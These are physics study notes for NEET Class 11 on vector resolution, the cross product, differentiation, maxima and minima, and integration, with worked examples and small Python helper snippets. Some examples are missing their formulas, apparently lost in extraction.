Thus OM and MB are the components of b along a and perpendicular to a.
Now OM = (b cos θ)(a/|a|) = (a · b/|a|²) a and MB = b − OM
Hence, components of b along a and perpendicular to a are
(a . b/ |a|2) a and b - (a . b / |a|2) a respectively.
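The two components can be computed directly (function names are ours):

```python
def dot(a, b):
    return sum(x * y for x, y in zip(a, b))

def decompose(b, a):
    """Return (b_parallel, b_perpendicular) with respect to a:
    b_par = (a.b/|a|^2) a  and  b_perp = b - b_par."""
    scale = dot(a, b) / dot(a, a)
    b_par = tuple(scale * x for x in a)
    b_perp = tuple(x - y for x, y in zip(b, b_par))
    return b_par, b_perp

b_par, b_perp = decompose((3.0, 4.0), (1.0, 0.0))
```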
Ex.21 The velocity of a particle is given by . Find the vector component of its velocity parallel to the line .
Sol. Component of along
11.2 Vector product
The vector product or cross product of any two vectors A and B, denoted as A × B
(read A cross B) is defined as :
A × B = AB sin θ n̂
Here θ is the angle between the vectors and the direction n̂ is given by the right-hand-thumb rule.
Right - Hand - Thumb Rule :
To find the direction of A × B, draw the two vectors A and B with both the tails coinciding. Now place your stretched right palm perpendicular to the plane of A and B in such a way that the fingers are along the vector A, and when the fingers are closed they go towards B. The direction of the thumb gives the direction of A × B.
Properties :
• Vector product of two vectors is always a vector perpendicular to the plane containing the two vectors, i.e. orthogonal to both the vectors A and B, though the vectors A and B may or may not be orthogonal.
• Vector product of two vectors is not commutative, i.e. A × B ≠ B × A. But A × B = −(B × A)
• The vector product is distributive when the order of the vectors is strictly maintained, i.e. A × (B + C) = A × B + A × C
• The magnitude of the vector product of two vectors will be maximum when sin θ = max = 1, i.e. θ = 90° : |A × B|max = AB
• The magnitude of the vector product of two non-zero vectors will be minimum when |sin θ| = minimum = 0, i.e. θ = 0° or 180°; i.e., if the vector product of two non-zero vectors vanishes, the vectors are collinear.
• The self cross product, i.e. the product of a vector by itself, vanishes : A × A = 0 (a null vector).
• In case of a unit vector n̂ : n̂ × n̂ = 0 ⇒ î × î = ĵ × ĵ = k̂ × k̂ = 0
• In case of orthogonal unit vectors î, ĵ, k̂, in accordance with the right-hand-thumb rule : î × ĵ = k̂, ĵ × k̂ = î, k̂ × î = ĵ
• In terms of components : A × B = (AyBz − AzBy) î + (AzBx − AxBz) ĵ + (AxBy − AyBx) k̂
Ex.22 A is eastwards and B is downwards. Find the direction of A × B.
Sol. Applying the right-hand-thumb rule we find that A × B is along North.
Ex.23 If |A · B| = |A × B|, find the angle between A and B.
Sol. AB cos θ = AB sin θ ⇒ tan θ = 1 ⇒ θ = 45°
Ex.24 If A × B = C, then C is perpendicular to both A and B.
Ex.25 Find if and
Sol. = =
Ex.26 (i) A is North-East and B is downwards; find the direction of A × B
(ii) Find × if and
Ans. (i) North - West. (ii)
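The component form of the cross product, and its anti-commutativity, can be checked in code (the helper name is ours):

```python
def cross(a, b):
    """a x b in component form (right-hand rule)."""
    return (a[1] * b[2] - a[2] * b[1],
            a[2] * b[0] - a[0] * b[2],
            a[0] * b[1] - a[1] * b[0])

i_hat, j_hat, k_hat = (1, 0, 0), (0, 1, 0), (0, 0, 1)
```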
12. POSITION VECTOR :
Position vector for a point is the vector whose tail is the origin and whose head is the given point itself.
Position vector of a point defines the position of the point w.r.t. the origin.
13. DISPLACEMENT VECTOR :
Change in position vector of particle is known as displacement vector.
Thus we can represent a displacement vector in space starting from the point (x₁, y₁, z₁) and ending at (x₂, y₂, z₂) as Δr = (x₂ − x₁) î + (y₂ − y₁) ĵ + (z₂ − z₁) k̂
CALCULUS
14. Constants : They are fixed real numbers whose value does not change
Ex. 3, e, a, -1, etc.
15. Variable :
Something that is likely to vary, something that is subject to variation.
or
A quantity that can assume any of a set of values.
Types of variables.
(i) Independent variable : The independent variable is typically the variable being manipulated or changed.
(ii) Dependent variable : The dependent variable is the observed result of the independent variable being manipulated.
Ex. y = x2
here y is dependent variable and x is independent variable
16. FUNCTION :
Function is a rule of relationship between two variables in which one is assumed to be dependent and the other independent variable.
The temperature at which water boils depends on the elevation above sea level (the boiling point drops as you ascend). Here elevation above sea level is the independent variable and temperature is the dependent variable.
The interest paid on a cash investment depends on the length of time the investment is held. Here time is the independent and interest is the dependent variable.
In each case, the value of one variable quantity (dependent variable), which we might call y, depends on the value of another variable quantity (independent variable), which we might call x. Since the value of y is completely determined by the value of x, we say that y is a function of x and represent it mathematically as y = f(x).
All possible values of the independent variable (x) are called the domain of the function.
All possible values of the dependent variable (y) are called the range of the function.
Think of a function f as a kind of machine that produces an output value f(x) in its range whenever we feed it an input value x from its domain (figure).
When we study circles, we usually call the area A and the radius r. Since area depends on radius, we say that A is a function of r, A = f(r). The equation A = πr2 is a rule that tells how to calculate a unique (single) output value of A for each possible input value of the radius r.
A = f(r) = πr². (Here the rule of relationship which describes the function may be described as : square the radius and multiply by π.)
if r = 1 A = π
if r = 2 A = 4π
if r = 3 A = 9π
The set of all possible input values for the radius is called the domain of the function. The set of all output values of the area is the range of the function.
We usually denote functions in one of the two ways :
1. By giving a formula such as y = x2 that uses a dependent variable y to denote the value of the function.
2. By giving a formula such as f(x) = x² that uses a function symbol f to name the function.
Strictly speaking, we should call the function f and not f(x).
y = sin x. Here the function is sine; x is the independent variable.
Ex.27 The volume V of a ball (solid sphere) of radius r is given by the function V(r) = (4/3)πr³.
The volume of a ball of radius 3 m is?
Sol. V(3) = (4/3)π(3)³ = 36π m³.
Ex.28 Suppose that the function F is defined for all real numbers r by the formula.
F(r) = 2 (r -1) +3.
Evaluate F at the input values 0, 2, x + 2, and F(2).
Sol. In each case we substitute the given input value for r into the formula for F:
F(0) = 2(0 -1) + 3 = -2 + 3 = 1
F(2) = 2(2 -1) + 3 = 2 + 3 =5
F(x + 2) = 2 (x + 2 -1) + 3 = 2x + 5
F(F(2)) = F(5) = 2(5 − 1) + 3 = 11
Ex.29 A function f(x) is defined as f(x) = x² + 3. Find f(0), f(1), f(x²), f(x + 1) and f(f(1)).
Sol. f(0) = 02 + 3 = 3
f(1) = 1² + 3 = 4
f(x²) = (x²)² + 3 = x⁴ + 3
f(x +1) = (x + 1)2 + 3 = x2 + 2x + 4
f(f(1)) = f(4) = 4² + 3 = 19
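Ex.29 translates directly into code:

```python
def f(x):
    """f(x) = x^2 + 3 from Ex.29."""
    return x ** 2 + 3

values = (f(0), f(1), f(f(1)))  # f(f(1)) = f(4) = 19
```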
17. Differentiation
Finite difference :
The finite difference between two values of a physical quantity is represented by the Δ notation.
For example :
Difference in two values of y is written as Δy as given in the table below.
y₂ : 100, 100, 100
y₁ : 50, 99, 99.5
Δy = y₂ − y₁ : 50, 1, 0.5
Infinitely small difference :
The infinitely small difference means a very, very small difference. And this difference is represented by the 'd' notation instead of 'Δ'.
For example infinitely small difference in the values of y is written as 'dy'
if y2 = 100 and y1 = 99.9999999999999.....
then dy = 0.00000000000000..........00001
Definition of differentiation
Another name of differentiation is derivative. Suppose y is a function of x or y = f(x)
Differentiation of y with respect to x is denoted by the symbol f′(x),
where f′(x) = dy/dx ; dx is a very small change in x and dy is the corresponding very small change in y.
Notation : There are many ways to denote the derivative of function y = f(x), the most common notations are these :
y′ : "y prime" : nice and brief; does not name the independent variable
dy/dx : "dy by dx" : names the variables and uses d for derivative
df/dx : "df by dx" : emphasizes the function's name
d/dx (f) : "d by dx of f" : emphasizes the idea that differentiation is an operation performed on f
Dₓf : "Dx of f" : a common operator notation
ẏ : "y dot" : one of Newton's notations, now common for time derivatives, i.e. dy/dt
Average rates of change :
Given an arbitrary function y = f(x), we calculate the average rate of change of y with respect to x over the interval (x, x + Δx) by dividing the change in the value of y, i.e. Δy = f(x + Δx) − f(x), by the length of the interval Δx over which the change occurred.
The average rate of change of y with respect to x over the interval [x, x + Δx] = Δy/Δx = [f(x + Δx) − f(x)]/Δx
Geometrically
Δy/Δx = tan θ = slope of the line PQ
In triangle QPR, tan θ = QR/PR = Δy/Δx
therefore we can say that average rate of change of y with respect to x is equal to slope of the line joining P & Q.
The derivative of a function
We know that the average rate of change of y w.r.t. x is Δy/Δx = [f(x + Δx) − f(x)]/Δx
If the limit of this ratio exists as Δx → 0, then it is called the derivative of the given function f(x) and is denoted as f′(x) = dy/dx = lim (Δx→0) [f(x + Δx) − f(x)]/Δx
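The limit definition suggests a simple numerical approximation, a symmetric finite difference (the function name and step size dx are our choices):

```python
def derivative(f, x, dx=1e-6):
    """Estimate f'(x) as the average rate of change over a tiny
    symmetric interval around x."""
    return (f(x + dx) - f(x - dx)) / (2 * dx)

slope = derivative(lambda x: x ** 2, 3.0)  # d(x^2)/dx at x = 3 is 6
```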
18. GEOMETRICAL MEANING OF DIFFERENTIATION :
The geometrical meaning of differentiation is very useful in the analysis of graphs in physics. To understand the geometrical meaning of derivatives we should have knowledge of secants and tangents to a curve.
Secant and Tangent to a Curve
Secant : - A secant to a curve is a straight line, which intersects the curve at any two points.
Tangent :
A tangent is a straight line which touches the curve at a particular point. The tangent is a limiting case of the secant, which intersects the curve at two overlapping points.
In the figure-1 shown, if the value of Δx is gradually reduced then the point Q will move nearer to the point P. If the process is continuously repeated (figure-2), the value of Δx will be infinitely small and the secant PQ to the given curve will become a tangent at point P.
Therefore
we can say that the differentiation of y with respect to x, i.e. dy/dx, is equal to the slope of the tangent at point P(x, y),
or tan θ = dy/dx
(From fig-1 the average rate change of y from x to x+Δx is identical with the slope of secant PQ)
Rule No. 1 Derivative Of A Constant
The first rule of differentiation is that the derivative of every constant function is zero.
If c is a constant, then dc/dx = 0
Ex.30, ,
Rule No.2 Power Rule
If n is a real number, then d(xⁿ)/dx = n xⁿ⁻¹
To apply the power Rule, we subtract 1 from the original exponent (n) and multiply the result by n.
Ex.31
Function defined for x > 0 derivative defined only for x > 0
Function defined for x > 0 derivative not defined at x = 0
Rule No.3 The Constant Multiple Rule
If u is a differentiable function of x, and c is a constant, then d(cu)/dx = c du/dx
In particular, if n is a positive integer, then d(c xⁿ)/dx = c n xⁿ⁻¹
Ex.34 The derivative formula d(3x²)/dx = 3(2x) = 6x
says that if we rescale the graph of y = x² by multiplying each y-coordinate by 3, then we multiply the slope at each point by 3.
Ex.35 A useful special case
The derivative of the negative of a differentiable function is the negative of the function's derivative. Rule 3 with c = −1 gives d(−u)/dx = −du/dx
Rule No.4 The Sum Rule
The derivative of the sum of two differentiable functions is the sum of their derivatives.
If u and v are differentiable functions of x, then their sum u + v is differentiable at every point where u and v are both differentiable, and d(u + v)/dx = du/dx + dv/dx
The Sum Rule also extends to sums of more than two functions, as long as there are only finitely many functions in the sum. If u₁, u₂, ......., uₙ are differentiable at x, then so is u₁ + u₂ + ....... + uₙ, and d(u₁ + u₂ + ... + uₙ)/dx = du₁/dx + du₂/dx + ... + duₙ/dx
Notice that we can differentiate any polynomial term by term, the way we differentiated the polynomials in above example.
Rule No. 5 The Product Rule
If u and v are differentiable at x, then so is their product uv, and
d(uv)/dx = u dv/dx + v du/dx
The derivative of the product uv is u times the derivative of v plus v times the derivative of u. In prime notation,
(uv)' = uv' + vu'.
While the derivative of the sum of two functions is the sum of their derivatives, the derivative of the product of two functions is not the product of their derivatives. For instance,
d(x · x)/dx = d(x²)/dx = 2x, while d(x)/dx · d(x)/dx = 1 · 1 = 1, which is wrong
Ex.37 Find the derivative of y = (x² + 1)(x³ + 3)
Sol. Using the Product Rule with u = x² + 1 and v = x³ + 3, we find
dy/dx = (x² + 1)(3x²) + (x³ + 3)(2x)
= 3x⁴ + 3x² + 2x⁴ + 6x = 5x⁴ + 3x² + 6x
This example can be done as well (perhaps better) by multiplying out the original expression for y and differentiating the resulting polynomial. We now check :
y = (x² + 1)(x³ + 3) = x⁵ + x³ + 3x² + 3
dy/dx = 5x⁴ + 3x² + 6x
This is in agreement with our first calculation.
There are times, however, when the Product Rule must be used. In the following example, we have only numerical values to work with.
Ex.38 Let y = uv be the product of the functions u and v. Find y'(2) if u(2) = 3, u'(2) = -4, v(2) = 1, and v'(2) = 2.
Sol.
From the Product Rule, in the form y' = (uv)' = uv' + vu',
we have y'(2) = u(2) v'(2) + v(2) u'(2)
= (3) (2) + (1) (-4) = 6-4 = 2
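Ex.38 can be reproduced with point values only (the helper name is ours):

```python
def product_rule(u, uprime, v, vprime):
    """y' = (uv)' = u*v' + v*u', evaluated from point values."""
    return u * vprime + v * uprime

# Ex.38: u(2) = 3, u'(2) = -4, v(2) = 1, v'(2) = 2
yprime = product_rule(3, -4, 1, 2)  # (3)(2) + (1)(-4) = 2
```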
Rule No.6 The Quotient Rule
If u and v are differentiable at x, and v(x) ≠ 0, then the quotient u/v is differentiable at x,
and d(u/v)/dx = [v du/dx − u dv/dx]/v²
Just as the derivative of the product of two differentiable functions is not the product of their derivatives, the derivative of the quotient of two functions is not the quotient of their derivatives.
Ex.39 Find the derivative of y = (t² − 1)/(t² + 1)
Sol. We apply the Quotient Rule with u = t² − 1 and v = t² + 1 :
dy/dt = [(t² + 1)(2t) − (t² − 1)(2t)]/(t² + 1)² = 4t/(t² + 1)²
Rule No. 7 Derivative Of Sine Function : d(sin x)/dx = cos x
Ex.40
Rule No. 8 Derivative Of Cosine Function : d(cos x)/dx = −sin x
Ex.41 (a) y = 5x + cos x ⇒ dy/dx = 5 − sin x (Sum Rule)
(b) y = sin x cos x ⇒ dy/dx = sin x (−sin x) + cos x (cos x) (Product Rule)
= cos²x − sin²x = cos 2x
Rule No. 9 Derivatives Of Other Trigonometric Functions
Because sin x and cos x are differentiable functions of x, the related functions
tan x = sin x/cos x ; cot x = cos x/sin x
sec x = 1/cos x ; cosec x = 1/sin x
are differentiable at every value of x at which they are defined. Their derivatives, calculated from the Quotient Rule, are given by the following formulas :
d(tan x)/dx = sec²x ; d(cot x)/dx = −cosec²x
d(sec x)/dx = sec x tan x ; d(cosec x)/dx = −cosec x cot x
Ex.42 Find dy / dx if y = tan x.
Sol. d(tan x)/dx = d/dx (sin x/cos x) = [cos x · cos x − sin x · (−sin x)]/cos²x = (cos²x + sin²x)/cos²x = 1/cos²x = sec²x
Ex. 43
Rule No. 10 Derivative Of Logarithm And Exponential Functions
d(logₑ x)/dx = 1/x , d(eˣ)/dx = eˣ
Ex.44 y = eˣ · logₑ(x)
⇒ dy/dx = eˣ · logₑ(x) + eˣ · (1/x)
Rule No. 11 Chain Rule Or `Outside Inside' Rule
It sometimes helps to think about the Chain Rule the following way. If y = f(g(x)),
dy/dx = f′[g(x)] · g′(x)
In words : To find dy/dx, differentiate the "outside" function f and leave the "inside" g(x) alone; then multiply by the derivative of the inside.
We now know how to differentiate sin x and x2 -4, but how do we differentiate a composite like sin(x2 -4)?
The answer is, with the Chain Rule, which says that the derivative of the composite of two differentiable functions is the product of their derivatives evaluated at appropriate points. The Chain Rule is probably the most widely used differentiation rule in mathematics. This section describes the rule and how to use it. We begin with examples.
Ex.45 The function y = 6x -10 = 2(3x -5) is the composite of the functions y = 2u and u = 3x -5. How are the derivatives of these three functions related ?
Sol. We have dy/dx = 6, dy/du = 2, du/dx = 3
Since 6 = 2 × 3, dy/dx = (dy/du) · (du/dx)
Is it an accident that dy/dx = (dy/du) · (du/dx) ?
If we think of the derivative as a rate of change, our intuitions allows us to see that this relationship is reasonable. For y = f(u) and u = g(x), if y changes twice as fast as u and u changes three times as fast as x, then we expect y to change six times as fast as x.
Ex.46 Let us try this again on another function.
y = 9x4 +6x2 +1 = (3x2 +1)2
is the composite of y = u² and u = 3x² + 1. Calculating derivatives, we see that
(dy/du) · (du/dx) = 2(3x² + 1) · 6x = 36x³ + 12x
and dy/dx = d/dx (9x⁴ + 6x² + 1) = 36x³ + 12x
Once again, dy/dx = (dy/du) · (du/dx)
The derivative of the composite function f(g(x)) at x is the derivative of f at g(x) times the derivative of g at x.
Ex.47 Find the derivative of y = √(x² + 1)
Sol. Here y = f(g(x)), where f(u) = √u and u = g(x) = x² + 1. Since the derivatives of f and g are
f′(u) = 1/(2√u) and g′(x) = 2x,
the Chain Rule gives
dy/dx = f′(g(x)) · g′(x) = [1/(2√(x² + 1))] · (2x) = x/√(x² + 1)
Ex.48
Ex. 49 u = 1 - x2 and n = 1/4
(Function defined on [−1, 1])
Rule No. 12 Power Chain Rule
If u is a differentiable function of x and n is a real number, then d(uⁿ)/dx = n uⁿ⁻¹ du/dx
Ex.50 d/dx [1/(3x − 2)] = d/dx (3x − 2)⁻¹ = −1(3x − 2)⁻² · d/dx (3x − 2)
= −1(3x − 2)⁻²(3) = −3/(3x − 2)²
In part (d) we could also have found the derivative with the Quotient Rule.
Ex.51 (a)
Sol. Here u = Ax + B, du/dx = A
(b)
(c) d/dx log(Ax + B) = [1/(Ax + B)] · A
(d) d/dx tan(Ax + B) = sec²(Ax + B) · A
(e)
Note : These results are important
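These results can be spot-checked against a finite-difference derivative; here is a sketch for sin(Ax + B) (names, step size, and sample values are our own choices):

```python
import math

def derivative(f, x, dx=1e-6):
    return (f(x + dx) - f(x - dx)) / (2 * dx)

# d/dx sin(Ax + B) = A cos(Ax + B), checked at an arbitrary point
A, B, x = 2.0, 0.5, 0.3
numeric = derivative(lambda t: math.sin(A * t + B), x)
exact = A * math.cos(A * x + B)
```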
19. DOUBLE DIFFERENTIATION
If f is a differentiable function, then its derivative f′ is also a function, so f′ may have a derivative of its own, denoted by (f′)′ = f″. This new function f″ is called the second derivative of f because it is the derivative of the derivative of f. Using Leibniz notation, we write the second derivative of y = f(x) as d²y/dx² = d/dx (dy/dx)
Another notation is f″(x) = D²f(x).
Ex.52 If f(x) = x cos x, find f″(x).
Sol. Using the Product Rule, we have f′(x) = cos x − x sin x
To find f″(x) we differentiate f′(x) :
f″(x) = −x cos x − sin x − sin x = −x cos x − 2 sin x
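Ex.52 can be cross-checked with a central-difference estimate of the second derivative (helper name, step size, and test point are ours):

```python
import math

def second_derivative(f, x, dx=1e-4):
    """Central-difference estimate of f''(x)."""
    return (f(x + dx) - 2 * f(x) + f(x - dx)) / (dx * dx)

# f(x) = x cos x  ->  f''(x) = -x cos x - 2 sin x
x = 0.7
numeric = second_derivative(lambda t: t * math.cos(t), x)
exact = -x * math.cos(x) - 2 * math.sin(x)
```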
20. Application of derivative Differentiation as a rate of change
dy/dx is the rate of change of 'y' with respect to 'x' :
For examples :
(i) v = dx/dt : velocity 'v' is the rate of change of displacement 'x' with respect to time 't'
(ii) a = dv/dt : acceleration 'a' is the rate of change of velocity 'v' with respect to time 't'
(iii) F = dp/dt : force 'F' is the rate of change of momentum 'p' with respect to time 't'
(iv) τ = dL/dt : torque 'τ' is the rate of change of angular momentum 'L' with respect to time 't'
(v) P = dW/dt : power 'P' is the rate of change of work 'W' with respect to time 't'
Ex.53 The area A of a circle is related to its diameter by the equation A = πD²/4.
How fast is the area changing with respect to the diameter when the diameter is 10 m ?
Sol. The (instantaneous) rate of change of the area with respect to the diameter is dA/dD = πD/2
When D = 10 m, the area is changing at the rate (π/2)(10) = 5π m²/m. This means that a small change ΔD m in the diameter would result in a change of about 5π ΔD m² in the area of the circle.
Physical Example :
Ex.54 Boyle's Law states that when a sample of gas is compressed at a constant temperature, the product of the pressure and the volume remains constant : PV = C. Find the rate of change of volume with respect to pressure.
Sol. V = C/P, so dV/dP = −C/P²
Ex.55 (a) Find the average rate of change of the area of a circle with respect to its radius r as r changed from
(i) 2 to 3 (ii) 2 to 2.5 (iii) 2 to 2.1
(b) Find the instantaneous rate of change when r = 2.
(c) Show that there rate of change of the area of a circle with respect to its radius (at any r) is equal to the circumference of the circle. Try to explain geometrically when this is true by drawing a circle whose radius is increased by an amount Δr. How can you approximate the resulting change in area ΔA if Δr is small ?
Sol. (a) (i) 5π (ii) 4.5 π (iii) 4.1 π
(b) 4π
(c) ΔA ≈ 2 πrΔr
21. MAXIMA & MINIMA
Suppose a quantity y depends on another quantity x in the manner shown in the figure. It becomes maximum at x₁ and minimum at x₂. At these points the tangent to the curve is parallel to the x-axis and hence its slope is tan θ = 0. Thus, at a maximum or a minimum, the slope dy/dx = 0.
Maxima
Just before the maximum the slope is positive, at the maximum it is zero and just after the maximum it is negative. Thus, dy/dx decreases at a maximum and hence the rate of change of dy/dx is negative at a maximum, i.e. d/dx (dy/dx) < 0 at a maximum. The quantity d/dx (dy/dx) is the rate of change of the slope. It is written as d²y/dx². Conditions for maxima are : (a) dy/dx = 0 (b) d²y/dx² < 0
Minima
Similarly, at a minimum the slope changes from negative to positive. Hence, with the increase of x the slope increases, which means the rate of change of slope with respect to x is positive.
Hence d/dx (dy/dx) = d²y/dx² > 0
Conditions for minima are :
(a) dy/dx = 0 (b) d²y/dx² > 0
Quite often it is known from the physical situation whether the quantity is a maximum or a minimum. The test on d²y/dx² may then be omitted.
Ex.56 Find maximum or minimum values of the functions :
(A) y = 25x2 + 5 -10x (B) y = 9 -(x -3)2
Sol. (A) For a maximum or minimum value, we put dy/dx = 0
⇒ 50x − 10 = 0 or x = 1/5
Further, d²y/dx² = 50
or d²y/dx² has a positive value at x = 1/5. Therefore, y has a minimum value at x = 1/5. Substituting x = 1/5 in the given equation, we get
ymin = 25(1/5)² + 5 − 10(1/5) = 1 + 5 − 2 = 4
(B) y = 9 − (x − 3)² = 9 − x² + 6x − 9
or y = 6x -x2
For a minimum or maximum value of y we substitute dy/dx = 0
⇒ 6 − 2x = 0
x = 3
To check whether the value of y is maximum or minimum at x = 3, we have to check whether d²y/dx² is positive or negative.
d²y/dx² = −2, i.e. d²y/dx² is negative at x = 3. Hence, the value of y is maximum. This maximum value of y is,
ymax = 9 -(3 -3)2 = 9
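The conditions for a minimum in Ex.56(A) can be verified with finite differences (helper names, step sizes and the test point are our choices):

```python
def derivative(f, x, dx=1e-6):
    return (f(x + dx) - f(x - dx)) / (2 * dx)

def second_derivative(f, x, dx=1e-4):
    return (f(x + dx) - 2 * f(x) + f(x - dx)) / (dx * dx)

f = lambda x: 25 * x ** 2 + 5 - 10 * x  # Ex.56(A)
x0 = 0.2                                # the critical point x = 1/5
```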
22. INTEGRATION
Definitions :
A function F(x) is an antiderivative of a function f(x) if
F′(x) = f(x)
for all x in the domain of f. The set of all antiderivatives of f is the indefinite integral of f with respect to x, denoted by ∫f(x) dx
The symbol ∫ is an integral sign. The function f is the integrand of the integral and x is the variable of integration.
For example, if f(x) = x³ then f′(x) = 3x²
So an integral of 3x² is x³
Similarly, if f(x) = x³ + 4, then also f′(x) = 3x²
Therefore the general integral of 3x² is x³ + c, where c is a constant
Given one antiderivative F of a function f, the other antiderivatives of f differ from F by a constant. We indicate this in integral notation in the following way :
∫f(x) dx = F(x) + C .....(i)
The constant C is the constant of integration or arbitrary constant. Equation (i) is read, "The indefinite integral of f with respect to x is F(x) + C." When we find F(x) + C, we say that we have integrated f and evaluated the integral.
Ex.57 Evaluate
Sol. ∫2x dx = x² + C
The formula x² + C generates all the antiderivatives of the function 2x. The functions x² + 1, x² − π, and
every other function of the form x² + constant are antiderivatives of the function 2x, as you can check by differentiation.
Many of the indefinite integrals needed in scientific work are found by reversing derivative formulas.
Integral Formulas
Indefinite Integral (with the reversed derivative formula that justifies it) :
1. ∫xⁿ dx = xⁿ⁺¹/(n + 1) + C, n ≠ −1, n rational (special case ∫dx = x + C), since d/dx [xⁿ⁺¹/(n + 1)] = xⁿ
2. ∫sin kx dx = −(cos kx)/k + C, since d/dx [−(cos kx)/k] = sin kx
3. ∫cos kx dx = (sin kx)/k + C, since d/dx [(sin kx)/k] = cos kx
4. ∫sec²x dx = tan x + C, since d/dx (tan x) = sec²x
5. ∫cosec²x dx = −cot x + C, since d/dx (−cot x) = cosec²x
6. ∫sec x tan x dx = sec x + C, since d/dx (sec x) = sec x tan x
7. ∫cosec x cot x dx = −cosec x + C, since d/dx (−cosec x) = cosec x cot x
Ex.58 Examples based on above formulas :
(a)
(b) ∫x⁵ dx = x⁶/6 + C Formula 1 with n = 5
(c) Formula 1 with n =
(d) ∫sin 2x dx = −(cos 2x)/2 + C Formula 2 with k = 2
(e) = = Formula 3 with k =
Ex.59 Right : ∫x cos x dx = x sin x + cos x + C
Reason : The derivative of the right-hand side is the integrand :
Check : d/dx (x sin x + cos x + C) = x cos x + sin x − sin x + 0 = x cos x.
Wrong : ∫x cos x dx = x sin x + C
Reason : The derivative of the right-hand side is not the integrand :
Check : d/dx (x sin x + C) = x cos x + sin x + 0 ≠ x cos x
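The "check by differentiating" step in Ex.59 is easy to automate (helper name and sample point are ours):

```python
import math

def derivative(f, x, dx=1e-6):
    return (f(x + dx) - f(x - dx)) / (2 * dx)

F = lambda x: x * math.sin(x) + math.cos(x)  # candidate antiderivative
f = lambda x: x * math.cos(x)                # integrand
err = abs(derivative(F, 1.3) - f(1.3))       # should be ~0
```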
Rule No. 1 Constant Multiple Rule
• A function is an antiderivative of a constant multiple kf of a function f if and only if it is k times an antiderivative of f : ∫k f(x) dx = k ∫f(x) dx
Ex.60 = =
Rule No.2 Sum And Difference Rule
• A function is an antiderivative of a sum or difference f ± g if and only if it is the sum or difference of an antiderivative of f and an antiderivative of g : ∫[f(x) ± g(x)] dx = ∫f(x) dx ± ∫g(x) dx
Ex.61 Term-by-term integration
Evaluate : ∫(x² − 2x + 5) dx
Sol. If we recognize that (x³/3) − x² + 5x is an antiderivative of x² − 2x + 5, we can evaluate the integral as ∫(x² − 2x + 5) dx = x³/3 − x² + 5x + C.
If we do not recognize the antiderivative right away, we can generate it term by term with the Sum and Difference Rule :
∫(x² − 2x + 5) dx = ∫x² dx − ∫2x dx + ∫5 dx = (x³/3 + C₁) − (x² + C₂) + (5x + C₃)
This formula is more complicated than it needs to be. If we combine C₁, C₂ and C₃ into a single constant
C = C₁ + C₂ + C₃, the formula simplifies to x³/3 − x² + 5x + C
and still gives all the antiderivatives there are. For this reason we recommend that you go right to the final form even if you elect to integrate term by term. Write
∫(x² − 2x + 5) dx = x³/3 − x² + 5x + C
Find the simplest antiderivative you can for each part and add the constant at the end.
Ex.62 We can sometimes use trigonometric identities to transform integrals we do not know how to evaluate into integrals we do know how to evaluate. The integral formulas for sin²x and cos²x arise frequently in applications.
(a) ∫sin²x dx = ∫[(1 − cos 2x)/2] dx = x/2 − (sin 2x)/4 + C
(b) ∫cos²x dx = ∫[(1 + cos 2x)/2] dx = x/2 + (sin 2x)/4 + C
As in part (a), but with a sign change
23. Some Indefinite Integrals (an arbitrary constant C should be added to each of these integrals)
(a) ∫xⁿ dx = xⁿ⁺¹/(n + 1) + C (provided n ≠ −1)
(b)
(c)
(d)
(e)
(f)
Ex.63 (a)
(b)
(c)
(d)
(e)
(f)
(g)
(h)
24. DEFINITE INTEGRATION OR INTEGRATION WITH LIMITS
Ex.64 ∫₋₁⁴ 3 dx = 3[x]₋₁⁴ = 3[4 − (−1)] = (3)(5) = 15
∫₀^(π/2) sin x dx = [−cos x]₀^(π/2) = −cos(π/2) + cos(0) = −0 + 1 = 1
Ex.65 (1)
(2)
(3)
25. APPLICATION OF DEFINITE INTEGRAL
Calculation Of Area Of A Curve.
From graph shown in figure if we divide whole area in infinitely small strips of dx width.
We take a strip at x position of dx width.
Small area of this strip dA = f(x) dx
So, the total area between the curve and the x-axis = sum of the areas of all strips = ∫ₐᵇ f(x) dx
Let f(x) > 0 be continuous on [a, b]. The area of the region between the graph of f and the x-axis is A = ∫ₐᵇ f(x) dx
Ex.66 Using an area to evaluate a definite integral
Evaluate ∫ₐᵇ x dx, 0 < a < b.
Sol. We sketch the region under the curve y = x, a ≤ x ≤ b (figure) and see that it is a trapezoid with height (b − a) and parallel sides (bases) a and b.
The value of the integral is the area of this trapezoid :
Thus ∫ₐᵇ x dx = (b² − a²)/2
and so on.
Notice that x²/2 is an antiderivative of x, further evidence of a connection between antiderivatives and summation.
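The trapezoid result can be confirmed in code (function names and the sample limits a = 1, b = 4 are ours):

```python
def integral_of_x(a, b):
    """Definite integral of x from a to b via the antiderivative x^2/2."""
    return b * b / 2 - a * a / 2

def trapezoid_area(a, b):
    """Area of the trapezoid under y = x on [a, b]:
    height (b - a), parallel sides a and b."""
    return (b - a) * (a + b) / 2

val_antideriv = integral_of_x(1.0, 4.0)
val_geometry = trapezoid_area(1.0, 4.0)
```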
(i) To find impulse
J = ∫F dt, since F = dp/dt implies Δp = ∫F dt
Ex.67 If F = kt, then find the impulse at t = 3 sec.
Sol. The impulse will be the area under the F − t curve
J = ∫₀³ kt dt = k[t²/2]₀³ = 9k/2
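Ex.67 can also be checked by a midpoint-rule numerical integration (function name and the sample value k = 2 are ours); the exact impulse at t = 3 s is k t²/2 = 9k/2:

```python
def impulse(k, t_end, steps=100000):
    """Midpoint-rule integral of F = k*t from 0 to t_end."""
    dt = t_end / steps
    return sum(k * (i + 0.5) * dt * dt for i in range(steps))

J = impulse(k=2.0, t_end=3.0)  # exact value: 9*k/2 = 9.0
```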
2. To calculate work done by a force : W = ∫F dx
So the area under the F − x curve will give the value of the work done.
The document Resolution of Vectors: Motion in a Plane - Notes | Study Physics Class 11 - NEET is a part of the NEET Course Physics Class 11.
All you need of NEET at this link: NEET
## Physics Class 11
127 videos|464 docs|210 tests
